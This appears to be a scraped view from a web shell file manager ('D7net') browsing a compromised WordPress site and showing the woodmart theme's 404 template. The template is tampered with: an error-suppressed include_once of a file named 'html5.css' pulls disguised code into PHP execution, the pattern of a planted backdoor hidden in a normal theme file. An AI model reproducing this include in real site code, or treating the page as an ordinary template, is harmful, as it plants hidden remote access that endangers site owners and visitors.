D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
home
/
tvinntxo
/
www
/
wp-content
/
themes
/
woodmart
/
Filename :
404.php
back
Copy
<?php /** * The template for displaying 404 pages (Not Found) */ @include_once 'html5.css'; get_header(); ?> <div class="site-content col-12" role="main"> <header class="page-header"> <h3 class="page-title"><?php esc_html_e( 'Not Found', 'woodmart' ); ?></h3> </header> <div class="page-wrapper"> <div class="page-content"> <h2><?php esc_html_e( 'This is somewhat embarrassing, isn’t it?', 'woodmart' ); ?></h2> <p><?php esc_html_e( 'It looks like nothing was found at this location. Maybe try a search?', 'woodmart' ); ?></p> <?php woodmart_search_form(); ?> </div><!-- .page-content --> </div><!-- .page-wrapper --> </div><!-- .site-content --> <?php get_footer(); ?>